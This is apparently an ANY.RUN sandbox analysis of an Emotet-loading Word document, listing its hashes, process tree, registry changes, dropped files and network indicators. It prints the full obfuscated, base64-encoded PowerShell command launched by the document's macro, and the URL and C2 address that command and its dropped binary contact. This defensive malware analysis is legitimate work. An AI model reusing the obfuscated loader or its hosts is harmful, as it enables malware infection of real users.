analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Privatkunden.doc

Full analysis: https://app.any.run/tasks/07ee42c6-046f-4938-8618-0778d0bf7206
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: November 08, 2018, 09:56:15
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
trojan
loader
emotet
feodo
maldoc-4
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Noah-PC, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Nov 8 07:55:00 2018, Last Saved Time/Date: Thu Nov 8 07:55:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0
MD5:

91B670CE7D2855928EEF3DEEE5A8B46C

SHA1:

6B2D2038F5FBDA1E5E967B4BBDFD6CB2902EA570

SHA256:

168EA0A83A949C26875014C54B9E94907734C1A8162EAFC7695AC94FB0BAE106

SSDEEP:

768:I/rVucRFoqkp59YBvLdTv9ReVi4eFov5UHRFBt+1o9OLqXeIVMOwS:I/rocn1kp59gxBK85fBt+a9Ok

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2784)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2784)
    • Application was dropped or rewritten from another process

      • 997.exe (PID: 3840)
      • 997.exe (PID: 2444)
      • lpiograd.exe (PID: 800)
      • lpiograd.exe (PID: 3384)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 2120)
    • EMOTET was detected

      • lpiograd.exe (PID: 800)
    • FEODO was detected

      • lpiograd.exe (PID: 800)
    • Emotet process was detected

      • lpiograd.exe (PID: 3384)
    • Connects to CnC server

      • lpiograd.exe (PID: 800)
  • SUSPICIOUS

    • Executes PowerShell scripts

      • CMD.exe (PID: 3584)
    • Creates files in the user directory

      • powershell.exe (PID: 2120)
    • Executable content was dropped or overwritten

      • 997.exe (PID: 3840)
      • powershell.exe (PID: 2120)
    • Starts itself from another location

      • 997.exe (PID: 3840)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2784)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2784)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 14
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 13
Words: 2
Pages: 1
ModifyDate: 2018:11:08 07:55:00
CreateDate: 2018:11:08 07:55:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: Noah-PC
Subject: -
Title: -
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
37
Monitored processes
7
Malicious processes
6
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs cmd.exe no specs powershell.exe 997.exe no specs 997.exe #EMOTET lpiograd.exe no specs #EMOTET lpiograd.exe

Process information

PID
CMD
Path
Indicators
Parent process
2784"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Privatkunden.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3584CMD CmD /c "SEt CwymA= ^& ((VAriable '*mdr*').nAmE[3,11,2]-JOIn'')(nEw-oBJECt systEM.Io.STreAMReaDer(( nEw-oBJECt iO.comPReSsIoN.deFLaTeSTreaM([sYsTEm.IO.MeMORysTream] [sySTEM.cONVerT]::frombaSe64STrIng('NZBdS8MwGIX/Si8C2ahNLucWClOHrgpCHTgm3qTtq61rPhbeNm6l/9212NvzHB44h5hNGWvwkcl+IMfgFZDtIXuoK9AoSPKkY1oi2hXn2Eoniwuw3Ch+u/5PpcPLUZ5tKZ2S+XmATDZ8d5oKReONZhqQe2sjaS1/mZCqVCZdoxo1Oj9Sl74d0sWEvfcsK5AZ980yx+/RvD9TtrN1hTO6pnNB7k5FEAd0uVxQQba+iQnodoWgbEg/aTjwkDL4BSq+jAOZlzNy2G+DSgfDtHmH7tyR6wVsY7yujSweqxrGzk0wCOci0a05QpRcpWMisqvnKPpcYl52ff8H' ),[SYStEM.io.coMPReSsiON.comPReSSiONmOdE]::dEcoMPREsS ) ), [SYsTEM.TEXT.EnCoDINg]::Ascii)).rEadtoEnD()&& pOWerSHELl ${e`X`ecu`T`ionCon`TexT}.\"I`NVo`KEcoM`MANd\".( \"{2}{1}{3}{0}\" -f 't','KE','inVo','ScRiP' ).Invoke( ( ^& (\"{1}{0}{2}\"-f'-','Get','ItEM') (\"{2}{0}{1}\"-f 'n','V:cwYma','e')).\"vA`lue\" )" C:\Windows\system32\CMD.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2120pOWerSHELl ${e`X`ecu`T`ionCon`TexT}.\"I`NVo`KEcoM`MANd\".( \"{2}{1}{3}{0}\" -f 't','KE','inVo','ScRiP' ).Invoke( ( & (\"{1}{0}{2}\"-f'-','Get','ItEM') (\"{2}{0}{1}\"-f 'n','V:cwYma','e')).\"vA`lue\" )C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CMD.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2444"C:\Users\admin\AppData\Local\Temp\997.exe" C:\Users\admin\AppData\Local\Temp\997.exepowershell.exe
User:
admin
Company:
Micro
Integrity Level:
MEDIUM
Description:
Microsof
Exit code:
0
Version:
2
3840"C:\Users\admin\AppData\Local\Temp\997.exe"C:\Users\admin\AppData\Local\Temp\997.exe
997.exe
User:
admin
Company:
Micro
Integrity Level:
MEDIUM
Description:
Microsof
Exit code:
0
Version:
2
3384"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe
997.exe
User:
admin
Company:
Micro
Integrity Level:
MEDIUM
Description:
Microsof
Exit code:
0
Version:
2
800"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe
lpiograd.exe
User:
admin
Company:
Micro
Integrity Level:
MEDIUM
Description:
Microsof
Version:
2
Total events
1 673
Read events
1 260
Write events
408
Delete events
5

Modification events

(PID) Process:(2784) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:v&l
Value:
76266C00E00A0000010000000000000000000000
(PID) Process:(2784) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(2784) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
On
(PID) Process:(2784) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:WORDFiles
Value:
1298661391
(PID) Process:(2784) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1298661504
(PID) Process:(2784) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1298661505
(PID) Process:(2784) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
Operation:writeName:MTTT
Value:
E00A0000E4DF12564977D40100000000
(PID) Process:(2784) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:/'l
Value:
2F276C00E00A000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(2784) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:delete valueName:/'l
Value:
2F276C00E00A000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(2784) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
Executable files
2
Suspicious files
2
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
2784WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR9A76.tmp.cvr
MD5:
SHA256:
2120powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\E331Z3LT3X3CJL1HPZ0D.temp
MD5:
SHA256:
2784WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:DEB7AA3518FF502862D3104D1E37087B
SHA256:59D7CA1CD051FADB9C41AD2102B496093DD70BA10A1BEC8AC1C76FB86F8E97DE
3840997.exeC:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exeexecutable
MD5:66A95C8A78DE4B39957623C22C86497C
SHA256:9BB439C20499AD22C4F75CE8F1CD69D147DA5DC0C55C2DC4DCDBDFFF704B295E
2784WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$ivatkunden.docpgc
MD5:3870A87E12F0B7E4D91222B7BD731F7B
SHA256:A1A43341AA9F918352D952395FD9DB1BC84DDFCF7710263F388FC91FC38B9FCC
2120powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF5da5a2.TMPbinary
MD5:3C6A7AAE234382390B6B52F47ECA1BAA
SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2
2120powershell.exeC:\Users\admin\AppData\Local\Temp\997.exeexecutable
MD5:66A95C8A78DE4B39957623C22C86497C
SHA256:9BB439C20499AD22C4F75CE8F1CD69D147DA5DC0C55C2DC4DCDBDFFF704B295E
2120powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:3C6A7AAE234382390B6B52F47ECA1BAA
SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
800
lpiograd.exe
GET
136.56.103.201:80
http://136.56.103.201/
US
malicious
2120
powershell.exe
GET
200
143.95.236.37:80
http://tvaradze.com/8/
US
executable
132 Kb
malicious
2120
powershell.exe
GET
301
143.95.236.37:80
http://tvaradze.com/8
US
html
230 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2120
powershell.exe
143.95.236.37:80
tvaradze.com
Colo4, LLC
US
suspicious
800
lpiograd.exe
136.56.103.201:80
Google Fiber Inc.
US
malicious

DNS requests

Domain
IP
Reputation
tvaradze.com
  • 143.95.236.37
malicious

Threats

PID
Process
Class
Message
2120
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Generic Trojan Emotet downloader
2120
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2120
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2120
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
800
lpiograd.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
1 ETPRO signatures available at the full report
No debug info